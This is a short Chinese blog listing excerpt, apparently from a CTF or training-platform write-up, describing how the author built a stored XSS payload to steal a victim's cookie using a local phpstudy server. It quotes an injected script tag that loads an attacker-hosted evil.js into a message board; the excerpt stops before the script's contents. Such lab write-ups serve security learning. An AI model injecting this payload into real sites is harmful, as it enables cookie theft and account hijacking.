文章分类 -  封神台

摘要：tips提示就知道是要我们构造存储型xss payload获取受害者cookie。 本来我电脑上已经有了phpstudy，于是自己上网查资料写了代码。 网站留言部分注入<script src=”http://本机地址/phpstudy网站目录/evil.js”></script> evil.js文件 阅读全文